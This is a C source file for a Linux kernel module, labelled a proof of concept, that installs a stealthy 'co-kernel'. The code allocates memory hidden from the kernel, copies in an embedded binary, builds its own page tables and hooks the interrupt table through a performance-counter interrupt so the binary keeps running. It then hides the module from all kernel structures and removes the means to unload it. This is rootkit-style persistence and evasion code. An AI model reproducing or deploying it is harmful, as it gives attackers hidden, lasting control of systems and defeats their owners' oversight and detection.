/* SPDX-License-Identifier: GPL-2.0 */
/*
 * parasite_main.c — Co-kernel loader module
 *
 * This module orchestrates the complete co-kernel installation:
 *
 *   1. Allocate invisible memory (hidden from Linux direct map)
 *   2. Copy co-kernel binary into hidden pages
 *   3. Build standalone page tables for co-kernel's CR3
 *   4. Install PMI handler trampoline in IDT
 *   5. Configure PMU + LAPIC for hardware-driven periodic execution
 *   6. Hide the module from all kernel structures
 *
 * The module's init function runs in ~100ms, then the module
 * disappears from all introspection. The co-kernel continues
 * executing via hardware PMI interrupts.
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/string.h>
#include <linux/slab.h>
#include <linux/delay.h>

#include "../include/shared.h"
#include "memory.h"
#include "pagetable.h"
#include "execution.h"
#include "resolve.h"
#include "stealth.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("CoKernel PoC");
MODULE_DESCRIPTION("Co-kernel parallel execution PoC");

/*
 * The co-kernel binary is embedded in the module as a byte array.
 * It is generated by:
 *   xxd -i cokernel.bin > cokernel_blob.h
 */
#include "cokernel_blob.h"

/* External symbols from pmi_entry.S — used to measure trampoline size */
extern void component_pmi_entry(void);
extern void pmi_trampoline_end(void);
extern uint64_t trampoline_data[];

/* Offsets into trampoline_data (see pmi_entry.S) */
#define TD_COKERNEL_CR3     0
#define TD_STACK_TOP        1
#define TD_TICK_FN          2
#define TD_SAVED_RSP        3
#define TD_SAVED_CR3        4

/*
 * parasite_init — Module entry point.
 *
 * Executes the full installation sequence, then hides itself.
 * Returns 0 on success (module stays loaded but invisible).
 */
static int __init parasite_init(void)
{
    int ret;
    void *region;
    phys_addr_t phys_base;
    struct cokernel_comm *comm;
    void *trampoline_va;
    phys_addr_t trampoline_phys;
    size_t trampoline_size;
    uint64_t *tramp_data;

    pr_info("cokernel: === Installation starting ===\n");

    /* ── Step 1: Allocate invisible memory ─────────────────────── */
    pr_info("cokernel: [1/6] Allocating invisible memory...\n");

    ret = ck_alloc_invisible_memory();
    if (ret) {
        pr_err("cokernel: memory allocation failed: %d\n", ret);
        return ret;
    }

    phys_base = ck_get_phys_base();
    pr_info("cokernel: physical base = 0x%llx\n",
            (unsigned long long)phys_base);

    /* Allocate trampoline page (stays in Linux direct map) */
    ret = ck_alloc_trampoline_page();
    if (ret) {
        pr_err("cokernel: trampoline alloc failed: %d\n", ret);
        return ret;
    }

    trampoline_va = ck_get_trampoline_va();
    trampoline_phys = ck_get_trampoline_phys();

    /* Get temporary mapping for setup operations */
    region = ck_get_temp_mapping();
    if (!region) {
        pr_err("cokernel: temp mapping failed\n");
        return -ENOMEM;
    }

    /* ── Step 2: Copy co-kernel binary ─────────────────────────── */
    pr_info("cokernel: [2/6] Copying co-kernel binary (%u bytes)...\n",
            cokernel_bin_len);

    if (cokernel_bin_len > COKERNEL_TEXT_SIZE + COKERNEL_DATA_SIZE) {
        pr_err("cokernel: binary too large (%u > %lu)\n",
               cokernel_bin_len,
               COKERNEL_TEXT_SIZE + COKERNEL_DATA_SIZE);
        ck_remove_temp_mapping();
        return -E2BIG;
    }

    memcpy(region + COKERNEL_TEXT_OFFSET, cokernel_bin, cokernel_bin_len);
    pr_info("cokernel: binary copied to region offset 0x%lx\n",
            COKERNEL_TEXT_OFFSET);

    /* ── Step 3: Initialize communication page ─────────────────── */
    pr_info("cokernel: [3/6] Initializing communication page...\n");

    comm = (struct cokernel_comm *)(region + COKERNEL_COMM_OFFSET);
    memset(comm, 0, sizeof(*comm));
    comm->status = 0;   /* idle */
    comm->magic = 0;    /* will be set by co-kernel on first tick */

    /* ── Step 4: Build co-kernel page tables ───────────────────── */
    pr_info("cokernel: [4/6] Building page tables...\n");

    ret = ck_build_pagetables(region, phys_base, COKERNEL_TOTAL_SIZE,
                              trampoline_va, trampoline_phys);
    if (ret) {
        pr_err("cokernel: page table construction failed: %d\n", ret);
        ck_remove_temp_mapping();
        return ret;
    }

    /* ── Step 5: Set up PMI trampoline and execution ───────────── */
    pr_info("cokernel: [5/6] Configuring PMI execution...\n");

    /*
     * Copy the PMI trampoline assembly to the dedicated page.
     * This page is in Linux's direct map AND mapped in the
     * co-kernel's page tables at the same VA.
     */
    trampoline_size = (unsigned long)&pmi_trampoline_end -
                      (unsigned long)&component_pmi_entry;

    if (trampoline_size > PAGE_SIZE) {
        pr_err("cokernel: trampoline too large (%zu > %lu)\n",
               trampoline_size, PAGE_SIZE);
        ck_remove_temp_mapping();
        return -E2BIG;
    }

    memcpy(trampoline_va, (void *)&component_pmi_entry, trampoline_size);
    pr_info("cokernel: trampoline copied (%zu bytes) to %px\n",
            trampoline_size, trampoline_va);

    /*
     * Patch the data block in the trampoline copy.
     * The data block is at a known offset from the entry point.
     */
    {
        unsigned long data_offset = (unsigned long)&trampoline_data -
                                    (unsigned long)&component_pmi_entry;
        tramp_data = (uint64_t *)(trampoline_va + data_offset);

        tramp_data[TD_COKERNEL_CR3] = ck_get_pgd_phys();
        tramp_data[TD_STACK_TOP] = COKERNEL_VIRT_BASE + COKERNEL_STACK_TOP;
        tramp_data[TD_TICK_FN] = COKERNEL_VIRT_BASE + COKERNEL_TEXT_OFFSET;
        tramp_data[TD_SAVED_RSP] = 0;  /* filled at runtime */
        tramp_data[TD_SAVED_CR3] = 0;  /* filled at runtime */

        pr_info("cokernel: patched trampoline data:\n");
        pr_info("cokernel:   CR3       = 0x%llx\n", tramp_data[TD_COKERNEL_CR3]);
        pr_info("cokernel:   stack_top = 0x%llx\n", tramp_data[TD_STACK_TOP]);
        pr_info("cokernel:   tick_fn   = 0x%llx\n", tramp_data[TD_TICK_FN]);
    }

    /* Set up PMI: install IDT handler + configure PMU + LAPIC */
    ret = ck_setup_pmi_execution(trampoline_va);
    if (ret) {
        pr_err("cokernel: PMI setup failed: %d\n", ret);
        ck_remove_temp_mapping();
        return ret;
    }

    /* ── Step 6: Remove temp mapping, then hide module ─────────── */
    pr_info("cokernel: [6/6] Cleaning up and going stealth...\n");

    /* Remove the temporary vmap — last trace of our setup */
    ck_remove_temp_mapping();

    /*
     * Brief delay to let any pending printk buffers flush.
     * After hiding, our printk calls won't identify us.
     */
    msleep(50);

    /* Hide the module from all kernel structures */
    ck_hide_module();

    pr_info("cokernel: === Installation complete ===\n");
    pr_info("cokernel: PMI firing every %llu cycles on vector 0x%02x\n",
            PMI_INTERVAL, PMI_VECTOR);
    pr_info("cokernel: comm page at phys 0x%llx\n",
            (unsigned long long)(phys_base + COKERNEL_COMM_OFFSET));

    return 0;  /* Module stays loaded but invisible */
}

/*
 * No exit function — the module can never be unloaded since it's
 * hidden from the module list. This is intentional.
 */
static void __exit parasite_exit(void)
{
    /* This will never be called */
    pr_info("cokernel: exit (should never happen)\n");
}

module_init(parasite_init);
module_exit(parasite_exit);
